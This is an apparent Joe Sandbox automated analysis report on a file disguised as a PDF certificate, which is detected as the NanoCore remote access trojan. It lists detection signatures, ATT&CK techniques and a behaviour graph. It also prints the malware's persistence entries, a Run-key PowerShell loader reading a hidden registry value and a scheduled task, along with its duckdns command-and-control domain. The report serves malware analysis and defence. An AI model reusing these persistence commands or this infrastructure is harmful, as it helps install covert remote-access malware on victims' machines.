      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exeCode function: 0_2_0040336C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040336C
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: 5.2.CasPol.exe.244c4629.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.2.CasPol.exe.244c0000.6.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.2.CasPol.exe.229f3105.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.2.CasPol.exe.244c0000.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.2.CasPol.exe.229eeadc.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.2.CasPol.exe.229eeadc.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.2.CasPol.exe.229e9ca6.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000005.00000002.28417516925.00000000229E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.28422942050.00000000244C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 1072, type: MEMORYSTR

      Remote Access Functionality

      barindex
      Source: CasPol.exe, 00000005.00000002.28417516925.00000000229E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: CasPol.exe, 00000005.00000002.28417516925.00000000229E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
      Source: CasPol.exe, 00000005.00000002.28422063726.0000000023FC0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: CasPol.exe, 00000005.00000002.28422063726.0000000023FC0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
      Source: CasPol.exe, 00000005.00000002.28422942050.00000000244C0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: CasPol.exe, 00000005.00000002.28397844456.00000000219A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: CasPol.exe, 00000005.00000002.28397844456.00000000219A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
      Source: Yara matchFile source: 5.2.CasPol.exe.244c4629.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.2.CasPol.exe.244c0000.6.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.2.CasPol.exe.229f3105.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.2.CasPol.exe.244c0000.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.2.CasPol.exe.229eeadc.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.2.CasPol.exe.229eeadc.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.2.CasPol.exe.229e9ca6.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000005.00000002.28417516925.00000000229E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.28422942050.00000000244C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 1072, type: MEMORYSTR
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
      Command and Scripting Interpreter
      1
      DLL Side-Loading
      1
      DLL Side-Loading
      1
      Disable or Modify Tools
      11
      Input Capture
      2
      File and Directory Discovery
      Remote Services1
      Archive Collected Data
      1
      Ingress Tool Transfer
      Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault Accounts1
      Scheduled Task/Job
      1
      Scheduled Task/Job
      1
      Access Token Manipulation
      1
      Obfuscated Files or Information
      LSASS Memory114
      System Information Discovery
      Remote Desktop Protocol11
      Input Capture
      11
      Encrypted Channel
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts1
      PowerShell
      1
      Registry Run Keys / Startup Folder
      112
      Process Injection
      1
      Software Packing
      Security Account Manager31
      Security Software Discovery
      SMB/Windows Admin Shares1
      Clipboard Data
      1
      Remote Access Software
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
      Scheduled Task/Job
      1
      DLL Side-Loading
      NTDS2
      Process Discovery
      Distributed Component Object ModelInput Capture2
      Non-Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
      Registry Run Keys / Startup Folder
      11
      Masquerading
      LSA Secrets231
      Virtualization/Sandbox Evasion
      SSHKeylogging213
      Application Layer Protocol
      Scheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts231
      Virtualization/Sandbox Evasion
      Cached Domain Credentials1
      Application Window Discovery
      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
      Access Token Manipulation
      DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job112
      Process Injection
      Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
      Hidden Files and Directories
      /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1467968 Sample: Certificate#U00b7pdf.exe Startdate: 05/07/2024 Architecture: WINDOWS Score: 100 42 7fxcmft-olcmjfjxdk.duckdns.org 2->42 44 drive.usercontent.google.com 2->44 46 drive.google.com 2->46 60 Multi AV Scanner detection for domain / URL 2->60 62 Found malware configuration 2->62 64 Malicious sample detected (through community Yara rule) 2->64 68 9 other signatures 2->68 11 Certificate#U00b7pdf.exe 1 19 2->11         started        15 CasPol.exe 4 2->15         started        signatures3 66 Uses dynamic DNS services 42->66 process4 file5 36 C:\Users\user\...\Kommandosyntaksen.Knk, ASCII 11->36 dropped 76 Suspicious powershell command line found 11->76 78 Opens the same file many times (likely Sandbox evasion) 11->78 17 powershell.exe 12 11->17         started        20 conhost.exe 15->20         started        signatures6 process7 signatures8 54 Suspicious powershell command line found 17->54 56 Very long command line found 17->56 58 Found suspicious powershell code related to unpacking or dynamic code loading 17->58 22 powershell.exe 15 17->22         started        25 conhost.exe 17->25         started        process9 signatures10 70 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 22->70 72 Writes to foreign memory regions 22->72 74 Tries to detect Any.run 22->74 27 CasPol.exe 3 17 22->27         started        process11 dnsIp12 48 7fxcmft-olcmjfjxdk.duckdns.org 27->48 50 drive.google.com 142.250.191.110, 443, 49776 GOOGLEUS United States 27->50 52 drive.usercontent.google.com 142.250.191.129, 443, 49777 GOOGLEUS United States 27->52 38 C:\Users\user\AppData\Roaming\...\run.dat, International 27->38 dropped 40 C:\Users\user\AppData\Local\...\tmp39FB.tmp, XML 27->40 dropped 80 Detected Nanocore Rat 27->80 82 Uses schtasks.exe or at.exe to add and modify task schedules 27->82 84 Tries to detect Any.run 27->84 86 2 other signatures 27->86 32 schtasks.exe 1 27->32         started        file13 signatures14 process15 process16 34 conhost.exe 32->34         started       

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      Certificate#U00b7pdf.exe32%ReversingLabsWin32.Trojan.Generic
      Certificate#U00b7pdf.exe54%VirustotalBrowse
      Certificate#U00b7pdf.exe100%Joe Sandbox ML
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      drive.usercontent.google.com1%VirustotalBrowse
      drive.google.com0%VirustotalBrowse
      7fxcmft-olcmjfjxdk.duckdns.org12%VirustotalBrowse
      SourceDetectionScannerLabelLink
      http://nuget.org/NuGet.exe0%Avira URL Cloudsafe
      http://repository.certum.pl/ctnca.cer090%Avira URL Cloudsafe
      http://pesterbdd.com/images/Pester.png40%Avira URL Cloudsafe
      http://crl.certum.pl/ctsca2021.crl0o0%Avira URL Cloudsafe
      http://pesterbdd.com/images/Pester.png0%Avira URL Cloudsafe
      https://drive.google.com/80%Avira URL Cloudsafe
      http://crl.certum.pl/ctnca.crl0k0%Avira URL Cloudsafe
      http://pesterbdd.com/images/Pester.png410%VirustotalBrowse
      http://crl.certum.pl/ctsca2021.crl0o0%VirustotalBrowse
      http://nuget.org/NuGet.exe0%VirustotalBrowse
      http://crl.certum.pl/ctnca.crl0k0%VirustotalBrowse
      http://www.apache.org/licenses/LICENSE-2.0.html0%Avira URL Cloudsafe
      https://contoso.com/License0%Avira URL Cloudsafe
      https://drive.google.com/81%VirustotalBrowse
      http://pesterbdd.com/images/Pester.png9%VirustotalBrowse
      https://contoso.com/Icon0%Avira URL Cloudsafe
      https://drive.usercontent.google.com/0%Avira URL Cloudsafe
      http://www.apache.org/licenses/LICENSE-2.0.html0%VirustotalBrowse
      http://nsis.sf.net/NSIS_ErrorError0%Avira URL Cloudsafe
      http://www.apache.org/licenses/LICENSE-2.0.html40%Avira URL Cloudsafe
      https://github.com/Pester/Pester0%Avira URL Cloudsafe
      https://github.com/Pester/Pester40%Avira URL Cloudsafe
      https://contoso.com/License0%VirustotalBrowse
      http://repository.certum.pl/ctnca.cer090%VirustotalBrowse
      http://repository.certum.pl/ctsca2021.cer00%Avira URL Cloudsafe
      http://subca.ocsp-certum.com050%Avira URL Cloudsafe
      https://drive.usercontent.google.com/1%VirustotalBrowse
      https://github.com/Pester/Pester40%VirustotalBrowse
      https://github.com/Pester/Pester1%VirustotalBrowse
      https://drive.google.com/0%Avira URL Cloudsafe
      http://subca.ocsp-certum.com020%Avira URL Cloudsafe
      http://repository.certum.pl/ctsca2021.cer00%VirustotalBrowse
      http://subca.ocsp-certum.com010%Avira URL Cloudsafe
      http://nsis.sf.net/NSIS_ErrorError0%VirustotalBrowse
      https://contoso.com/Icon0%VirustotalBrowse
      https://contoso.com/0%Avira URL Cloudsafe
      https://nuget.org/nuget.exe0%Avira URL Cloudsafe
      http://crl.certum.pl/ctnca2.crl0l0%Avira URL Cloudsafe
      http://repository.certum.pl/ctnca2.cer090%Avira URL Cloudsafe
      http://crl.certum.pl/ctnca2.crl0l0%VirustotalBrowse
      7fxcmft-olcmjfjxdk.duckdns.org100%Avira URL Cloudmalware
      https://nuget.org/nuget.exe0%VirustotalBrowse
      http://www.apache.org/licenses/LICENSE-2.0.html40%VirustotalBrowse
      https://drive.google.com/0%VirustotalBrowse
      7fxcmft-olcmjfjxdk.duckdns.org12%VirustotalBrowse
      https://contoso.com/0%VirustotalBrowse
      http://www.quovadis.bm00%Avira URL Cloudsafe
      https://ocsp.quovadisoffshore.com00%Avira URL Cloudsafe
      http://crl.mics0%Avira URL Cloudsafe
      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%Avira URL Cloudsafe
      https://aka.ms/pscore6lB2r0%Avira URL Cloudsafe
      http://www.certum.pl/CPS00%Avira URL Cloudsafe
      http://repository.certum.pl/ctnca2.cer090%VirustotalBrowse
      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%VirustotalBrowse
      http://www.certum.pl/CPS00%VirustotalBrowse
      NameIPActiveMaliciousAntivirus DetectionReputation
      drive.google.com
      142.250.191.110
      truefalseunknown
      drive.usercontent.google.com
      142.250.191.129
      truefalseunknown
      7fxcmft-olcmjfjxdk.duckdns.org
      unknown
      unknowntrueunknown
      NameMaliciousAntivirus DetectionReputation
      true
        unknown
        7fxcmft-olcmjfjxdk.duckdns.orgtrue
        • 12%, Virustotal, Browse
        • Avira URL Cloud: malware
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        http://pesterbdd.com/images/Pester.png4powershell.exe, 00000004.00000002.24015082052.0000000004DAA000.00000004.00000800.00020000.00000000.sdmpfalse
        • 10%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.24019197601.0000000005CAE000.00000004.00000800.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        http://crl.certum.pl/ctsca2021.crl0oCertificate#U00b7pdf.exefalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        http://repository.certum.pl/ctnca.cer09Certificate#U00b7pdf.exefalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.24015082052.0000000004DAA000.00000004.00000800.00020000.00000000.sdmpfalse
        • 9%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        https://drive.google.com/8CasPol.exe, 00000005.00000002.28382435662.000000000519B000.00000004.00000020.00020000.00000000.sdmpfalse
        • 1%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        http://crl.certum.pl/ctnca.crl0kCertificate#U00b7pdf.exefalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.24015082052.0000000004DAA000.00000004.00000800.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        https://contoso.com/Licensepowershell.exe, 00000004.00000002.24019197601.0000000005CAE000.00000004.00000800.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        https://contoso.com/Iconpowershell.exe, 00000004.00000002.24019197601.0000000005CAE000.00000004.00000800.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        https://drive.usercontent.google.com/CasPol.exe, 00000005.00000002.28382435662.00000000051F4000.00000004.00000020.00020000.00000000.sdmpfalse
        • 1%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        http://nsis.sf.net/NSIS_ErrorErrorCertificate#U00b7pdf.exefalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        http://www.apache.org/licenses/LICENSE-2.0.html4powershell.exe, 00000004.00000002.24015082052.0000000004DAA000.00000004.00000800.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.24015082052.0000000004DAA000.00000004.00000800.00020000.00000000.sdmpfalse
        • 1%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        https://github.com/Pester/Pester4powershell.exe, 00000004.00000002.24015082052.0000000004DAA000.00000004.00000800.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        http://repository.certum.pl/ctsca2021.cer0Certificate#U00b7pdf.exefalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        http://subca.ocsp-certum.com05Certificate#U00b7pdf.exefalse
        • Avira URL Cloud: safe
        unknown
        https://drive.google.com/CasPol.exe, 00000005.00000002.28382435662.000000000519B000.00000004.00000020.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        http://subca.ocsp-certum.com02Certificate#U00b7pdf.exefalse
        • Avira URL Cloud: safe
        unknown
        http://subca.ocsp-certum.com01Certificate#U00b7pdf.exefalse
        • Avira URL Cloud: safe
        unknown
        https://contoso.com/powershell.exe, 00000004.00000002.24019197601.0000000005CAE000.00000004.00000800.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.24019197601.0000000005CAE000.00000004.00000800.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        http://crl.certum.pl/ctnca2.crl0lCertificate#U00b7pdf.exefalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        http://repository.certum.pl/ctnca2.cer09Certificate#U00b7pdf.exefalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        http://www.quovadis.bm0powershell.exe, 00000004.00000002.24020469340.0000000007620000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.28382435662.00000000051F4000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://ocsp.quovadisoffshore.com0powershell.exe, 00000004.00000002.24020469340.0000000007620000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.28382435662.00000000051F4000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://crl.micspowershell.exe, 00000004.00000002.24023428377.0000000008BA5000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.24015082052.0000000004C41000.00000004.00000800.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        https://aka.ms/pscore6lB2rpowershell.exe, 00000004.00000002.24015082052.0000000004C41000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://www.certum.pl/CPS0Certificate#U00b7pdf.exefalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        142.250.191.129
        drive.usercontent.google.comUnited States
        15169GOOGLEUSfalse
        142.250.191.110
        drive.google.comUnited States
        15169GOOGLEUSfalse
        Joe Sandbox version:40.0.0 Tourmaline
        Analysis ID:1467968
        Start date and time:2024-07-05 07:22:59 +02:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 16m 53s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
        Run name:Suspected Instruction Hammering
        Number of analysed new started processes analysed:10
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Sample name:Certificate#U00b7pdf.exe
        Detection:MAL
        Classification:mal100.troj.evad.winEXE@13/15@189/2
        EGA Information:
        • Successful, ratio: 75%
        HCA Information:
        • Successful, ratio: 96%
        • Number of executed functions: 269
        • Number of non-executed functions: 26
        Cookbook Comments:
        • Found application associated with file extension: .exe
        • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
        • Exclude process from analysis (whitelisted): dllhost.exe
        • Execution Graph export aborted for target powershell.exe, PID 5828 because it is empty
        • Not all processes where analyzed, report is missing behavior information
        • Report size exceeded maximum capacity and may have missing behavior information.
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
        TimeTypeDescription
        01:26:46API Interceptor30348211x Sleep call for process: CasPol.exe modified
        07:26:14Task SchedulerRun new task: DSL Monitor path: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe" s>$(Arg0)
        07:26:14AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Startup key %Ec32% -windowstyle minimized $Engrams252=(Get-ItemProperty -Path 'HKCU:\Jgerstuerne\').Curatives;%Ec32% -windowstyle minimized ($Engrams252)
        07:26:22AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Startup key %Ec32% -windowstyle minimized $Engrams252=(Get-ItemProperty -Path 'HKCU:\Jgerstuerne\').Curatives;%Ec32% -windowstyle minimized ($Engrams252)
        No context
        No context
        No context
